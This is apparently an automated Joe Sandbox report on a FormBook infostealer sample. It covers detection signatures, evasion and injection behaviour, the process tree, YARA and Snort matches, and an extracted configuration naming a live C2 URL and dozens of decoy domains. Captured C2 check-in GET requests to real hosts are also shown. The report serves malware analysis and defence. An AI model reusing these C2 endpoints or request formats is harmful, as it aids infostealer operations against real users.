Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.16340.31219.exe

Overview

General Information

Sample Name:SecuriteInfo.com.FileRepMalware.16340.31219.exe
Analysis ID:1336550
MD5:0c57a7aae080fd2eac42a31fa5b7f051
SHA1:2e181788e6dec9e170556e2daa39a61dc2bf8b89
SHA256:87770248637ba53e2fd2c65ec24b95659d9b1f2d3af87234601fd720f81d6fd8
Tags:exeFormbook
Infos:

Detection

FormBook, NSISDropper
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected NSISDropper
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Allocates memory with a write watch (potentially for evading sandboxes)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.16340.31219.exe (PID: 5364 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe MD5: 0C57A7AAE080FD2EAC42A31FA5B7F051)
    • xheuzyg.exe (PID: 1356 cmdline: "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" MD5: 25D54D83B6D68CAF9DE7655FF5E33651)
      • conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xheuzyg.exe (PID: 1664 cmdline: C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe MD5: 25D54D83B6D68CAF9DE7655FF5E33651)
        • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • rundll32.exe (PID: 4312 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
            • cmd.exe (PID: 5336 cmdline: /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • SkypeApp.exe (PID: 3840 cmdline: "C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca MD5: 7F4A25126DC7ABB0A94B1BC62587AF37)
  • cleanup
{"C2 list": ["www.glocraze.com/ju29/"], "decoy": ["xpermate.com", "bacheckadress.top", "jsrents.com", "xuangesmd.com", "mnchentampere.com", "iamdebs.com", "gwadkoup.com", "shoplittlezenone.shop", "jokergiftcard.buzz", "durufilmyapim.com", "sahabatterbaik19.xyz", "decode.tax", "wokeeducationhateskids.com", "klxcv.xyz", "dosfronterastx.com", "desertmoneymedia.com", "coynemanagement.online", "housesstore.com", "refreshquota.site", "hijama-pro.com", "gaming-chairs-vn-vi-2885437.fyi", "tuesdaymorningwuwu.com", "olivealley.online", "lineyours.com", "giollgoshop.site", "kelashealing.com", "spisanierussiadolgfaster.store", "bodacristianyjuani.com", "shop-hustlermindset.com", "theadelts.com", "umertazkeer.com", "infinitytrustbank.com", "thauthia12.click", "shutupandjam.net", "magick-cat.com", "power-pro.online", "wealthwithkate.com", "ascorpii.com", "quasi-discreetanga.best", "mzfgwh.top", "christopherromanski.online", "townstart.shop", "dwijtechnology.com", "rezultman.info", "e9pf4s.top", "pabmb5.top", "kprgrecruiting.com", "betmcc.pro", "girlypopups.com", "sellwithimam.com", "affordable58078.com", "sextapevidhot.com", "zg9tywlubmftzw5ldzmzmzk.com", "dilapakku.com", "tabareviera.com", "helpers4us.com", "sklm888.com", "greenspaces.xyz", "merchascarpamici.com", "ibrahimalnajjar.com", "xxds02.com", "idsuper-21.online", "naaraelucas.com", "hearing-aid-new.click"]}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries
      SourceRuleDescriptionAuthorStrings
      4.2.xheuzyg.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.xheuzyg.exe.400000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.xheuzyg.exe.400000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          4.2.xheuzyg.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.2.xheuzyg.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries
          No Sigma rule has matched
          Timestamp:192.168.2.73.33.130.19049727802031412 11/03/23-12:38:11.760375
          SID:2031412
          Source Port:49727
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.7108.186.24.17549717802031412 11/03/23-12:36:49.663320
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.734.149.87.4549729802031412 11/03/23-12:38:32.172304
          SID:2031412
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.7104.17.158.149716802031412 11/03/23-12:36:28.890688
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.7103.224.212.21649719802031412 11/03/23-12:37:30.104632
          SID:2031412
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.775.2.115.19649718802031412 11/03/23-12:37:09.512099
          SID:2031412
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.glocraze.com/ju29/"], "decoy": ["xpermate.com", "bacheckadress.top", "jsrents.com", "xuangesmd.com", "mnchentampere.com", "iamdebs.com", "gwadkoup.com", "shoplittlezenone.shop", "jokergiftcard.buzz", "durufilmyapim.com", "sahabatterbaik19.xyz", "decode.tax", "wokeeducationhateskids.com", "klxcv.xyz", "dosfronterastx.com", "desertmoneymedia.com", "coynemanagement.online", "housesstore.com", "refreshquota.site", "hijama-pro.com", "gaming-chairs-vn-vi-2885437.fyi", "tuesdaymorningwuwu.com", "olivealley.online", "lineyours.com", "giollgoshop.site", "kelashealing.com", "spisanierussiadolgfaster.store", "bodacristianyjuani.com", "shop-hustlermindset.com", "theadelts.com", "umertazkeer.com", "infinitytrustbank.com", "thauthia12.click", "shutupandjam.net", "magick-cat.com", "power-pro.online", "wealthwithkate.com", "ascorpii.com", "quasi-discreetanga.best", "mzfgwh.top", "christopherromanski.online", "townstart.shop", "dwijtechnology.com", "rezultman.info", "e9pf4s.top", "pabmb5.top", "kprgrecruiting.com", "betmcc.pro", "girlypopups.com", "sellwithimam.com", "affordable58078.com", "sextapevidhot.com", "zg9tywlubmftzw5ldzmzmzk.com", "dilapakku.com", "tabareviera.com", "helpers4us.com", "sklm888.com", "greenspaces.xyz", "merchascarpamici.com", "ibrahimalnajjar.com", "xxds02.com", "idsuper-21.online", "naaraelucas.com", "hearing-aid-new.click"]}
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeReversingLabs: Detection: 57%
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeVirustotal: Detection: 65%Perma Link
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeAvira: detected
          Source: http://www.e9pf4s.top/ju29/Avira URL Cloud: Label: phishing
          Source: http://www.durufilmyapim.comAvira URL Cloud: Label: malware
          Source: http://www.durufilmyapim.com/ju29/Avira URL Cloud: Label: malware
          Source: http://www.durufilmyapim.com/ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA==Avira URL Cloud: Label: malware
          Source: http://www.umertazkeer.com/ju29/www.mzfgwh.topAvira URL Cloud: Label: malware
          Source: http://www.sklm888.comAvira URL Cloud: Label: malware
          Source: http://www.umertazkeer.comAvira URL Cloud: Label: malware
          Source: http://www.merchascarpamici.com/ju29/:Avira URL Cloud: Label: malware
          Source: http://www.wokeeducationhateskids.comAvira URL Cloud: Label: malware
          Source: http://www.merchascarpamici.com/ju29/Avira URL Cloud: Label: malware
          Source: http://www.mnchentampere.com/ju29/Avira URL Cloud: Label: malware
          Source: http://www.dwijtechnology.com/ju29/www.klxcv.xyzAvira URL Cloud: Label: malware
          Source: http://www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0QAvira URL Cloud: Label: malware
          Source: http://www.bodacristianyjuani.comAvira URL Cloud: Label: malware
          Source: http://www.xuangesmd.com/ju29/Avira URL Cloud: Label: malware
          Source: http://www.xuangesmd.comAvira URL Cloud: Label: malware
          Source: http://www.wokeeducationhateskids.com/ju29/Avira URL Cloud: Label: malware
          Source: http://www.dwijtechnology.com/ju29/Avira URL Cloud: Label: malware
          Source: http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFmsAvira URL Cloud: Label: phishing
          Source: http://www.klxcv.xyz/ju29/Avira URL Cloud: Label: phishing
          Source: http://www.townstart.shop/ju29/Avira URL Cloud: Label: malware
          Source: www.umertazkeer.comVirustotal: Detection: 12%Perma Link
          Source: www.wokeeducationhateskids.comVirustotal: Detection: 8%Perma Link
          Source: www.sklm888.comVirustotal: Detection: 6%Perma Link
          Source: www.xuangesmd.comVirustotal: Detection: 7%Perma Link
          Source: glocraze.comVirustotal: Detection: 10%Perma Link
          Source: www.durufilmyapim.comVirustotal: Detection: 12%Perma Link
          Source: www.townstart.shopVirustotal: Detection: 11%Perma Link
          Source: www.gaming-chairs-vn-vi-2885437.fyiVirustotal: Detection: 11%Perma Link
          Source: www.glocraze.comVirustotal: Detection: 10%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeReversingLabs: Detection: 58%
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: xheuzyg.exe, 00000002.00000003.1228223743.000000001DE10000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000002.00000003.1227185095.000000001DFB0000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: xheuzyg.exe, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_00405EC2 FindFirstFileA,FindClose,0_2_00405EC2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 2_2_001C16A5 FindFirstFileExW,2_2_001C16A5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4_2_001C16A5 FindFirstFileExW,4_2_001C16A5
          Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exeCode function: 4x nop then pop edi4_2_00417D98
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi6_2_00137D98

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 108.186.24.175 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.17.26.8 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.17.158.1 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 198.177.124.40 80Jump to behavior
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49716 -> 104.17.158.1:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49717 -> 108.186.24.175:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49718 -> 75.2.115.196:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 103.224.212.216:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49727 -> 3.33.130.190:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49729 -> 34.149.87.45:80
          Source: DNS query: www.klxcv.xyz
          Source: DNS query: www.klxcv.xyz
          Source: Malware configuration extractorURLs: www.glocraze.com/ju29/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: global trafficHTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=jZmXybDTEhqhfjbWt8DWyZKNvc7QdVfFN8RblV5F5bs2BRUWluOZEJKJ+J3f2kZBRyfQB9gctA== HTTP/1.1Host: www.gaming-chairs-vn-vi-2885437.fyiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?Bb_=n8Crfq9d8L0uMe2mi2N2bIuprmrMns3qA2Eid6rDPq5MkWbkjsGFJF992xVz/9ETWq9TUrQEIA==&M2Mp=6lX0R0Q HTTP/1.1Host: www.sklm888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=9Lm8jqPme8OjdFMw6eGY6bGRl079o6M7fF/LdPaGLMmXDMBCcOms1FNC+m6WNGhZ2iLvmxSXpQ== HTTP/1.1Host: www.wokeeducationhateskids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q HTTP/1.1Host: www.umertazkeer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?Bb_=gDkZXs6+uubhkTTBwUg7wBT+4b2V8qQlIvdPiiNfmflrZ9ZAj1bLhBmsLpsiQ7EDnpvm500CUg==&M2Mp=6lX0R0Q HTTP/1.1Host: www.glocraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA== HTTP/1.1Host: www.durufilmyapim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 75.2.115.196 75.2.115.196
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 03 Nov 2023 11:37:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 03 Nov 2023 11:38:11 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "65271109-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
